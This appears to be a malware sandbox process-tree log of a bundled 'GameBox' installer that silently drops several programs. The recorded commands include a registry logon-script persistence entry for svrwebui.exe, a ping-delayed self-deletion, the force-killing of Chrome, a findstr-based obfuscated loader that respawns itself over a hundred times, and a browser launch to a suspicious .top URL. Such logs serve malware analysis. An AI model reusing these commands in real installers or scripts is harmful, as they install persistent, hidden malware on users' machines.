C:\Users\Admin\AppData\Local\Temp\is-D9TNV.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-D9TNV.tmp\Setup.tmp" /SL5="$504B4,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-1U4I1.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7216⤵PID:7820
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-83P9D.tmp\{app}\microsoft.cab -F:* %ProgramData%7⤵PID:5896
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-83P9D.tmp\{app}\microsoft.cab -F:* C:\ProgramData8⤵PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f7⤵PID:6404
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f8⤵PID:6760
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-83P9D.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-83P9D.tmp\{app}\vdi_compiler"7⤵PID:8340
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-83P9D.tmp\{app}\vdi_compiler.exe"8⤵PID:9688
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 49⤵
- Runs ping.exe
PID:5896
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7217⤵PID:5464
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"7⤵PID:8640
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5704 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629405739 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"4⤵PID:7704
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent3⤵
- Executes dropped EXE
PID:5748 -
C:\Users\Admin\AppData\Local\Temp\is-J85U3.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-J85U3.tmp\WEATHER Manager.tmp" /SL5="$202F8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent4⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\is-3J5AI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3J5AI.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7155⤵PID:8144
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-3J5AI.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-3J5AI.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629405739 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"6⤵PID:8532
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent3⤵
- Executes dropped EXE
PID:5832 -
C:\Users\Admin\AppData\Local\Temp\is-FQ6TC.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-FQ6TC.tmp\VPN.tmp" /SL5="$10396,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent4⤵PID:6140
-
C:\Users\Admin\AppData\Local\Temp\is-4302V.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4302V.tmp\Setup.exe" /silent /subid=7205⤵PID:5820
-
C:\Users\Admin\AppData\Local\Temp\is-6A68S.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-6A68S.tmp\Setup.tmp" /SL5="$402AA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-4302V.tmp\Setup.exe" /silent /subid=7206⤵PID:6268
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "7⤵PID:4428
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09018⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:6140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "7⤵PID:6236
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09018⤵PID:6620
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall7⤵PID:2448
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install7⤵PID:9856
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5856 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe4⤵PID:4532
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe5⤵
- Kills process with taskkill
PID:5968
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"3⤵
- Executes dropped EXE
PID:5348 -
C:\Users\Admin\AppData\Local\Temp\tmp3ACE_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp3ACE_tmp.exe"4⤵PID:6752
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"5⤵PID:6228
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks5⤵PID:7800
-
C:\Windows\SysWOW64\cmd.execmd6⤵PID:8004
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks7⤵PID:5564
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i7⤵PID:6932
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i8⤵PID:3196
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i9⤵PID:8212
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵PID:8696
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵PID:9072
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵PID:8572
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵PID:9112
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵PID:2088
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵PID:7736
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵PID:9460
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵PID:10044
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵PID:9512
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵PID:9800
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵PID:8284
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵PID:3456
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵PID:9780
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵PID:10104
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵PID:9252
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵PID:9692
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵PID:9512
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵PID:10072
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵PID:7300
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵PID:8704
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵PID:9608
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵PID:9272
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵PID:9220
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵PID:7648
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵PID:9948
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵PID:10048
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵PID:9980
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵PID:9412
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵PID:9652
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵PID:6600
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵PID:9624
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵PID:8204
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵PID:6728
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵PID:1356
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵PID:8440
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵PID:4576
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵PID:6600
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵PID:7152
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵PID:8568
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵PID:7024
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵PID:8240
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵PID:9484
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵PID:10008
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵PID:8684
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵PID:8940
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵PID:10200
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵PID:4308
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵PID:8204
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i62⤵PID:984
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i63⤵PID:5488
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i64⤵PID:4468
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i65⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i66⤵PID:9328
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i67⤵PID:9708
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i68⤵PID:8836
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i69⤵PID:6672
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i70⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i71⤵PID:8792
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i72⤵PID:1048
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i73⤵PID:7724
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i74⤵PID:8488
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i75⤵PID:9828
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i76⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i77⤵PID:9300
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i78⤵PID:6372
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i79⤵PID:4548
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i80⤵PID:10148
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i81⤵PID:2448
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i82⤵PID:8988
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i83⤵PID:10032
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i84⤵PID:8880
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i85⤵PID:9300
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i86⤵PID:10200
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i87⤵PID:8836
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i88⤵PID:9804
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i89⤵PID:8728
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i90⤵PID:10164
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i91⤵PID:4308
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i92⤵PID:8656
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i93⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i94⤵PID:1048
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i95⤵PID:9636
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i96⤵PID:9968
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i97⤵PID:4608
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i98⤵PID:9992
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i99⤵PID:8352
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i100⤵PID:8880
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i101⤵PID:7516
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i102⤵PID:6620
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i103⤵PID:9680
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i104⤵PID:8116
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i105⤵PID:8904
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i106⤵PID:8880
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i107⤵PID:1048
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i108⤵PID:4368
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i109⤵PID:10232
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i110⤵PID:9680
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i111⤵PID:9316
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i112⤵PID:8352
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i113⤵PID:5680
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i114⤵PID:1828
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i115⤵PID:7312
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i116⤵PID:9636
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i117⤵PID:4368
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i118⤵PID:6304
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i119⤵PID:6832
-
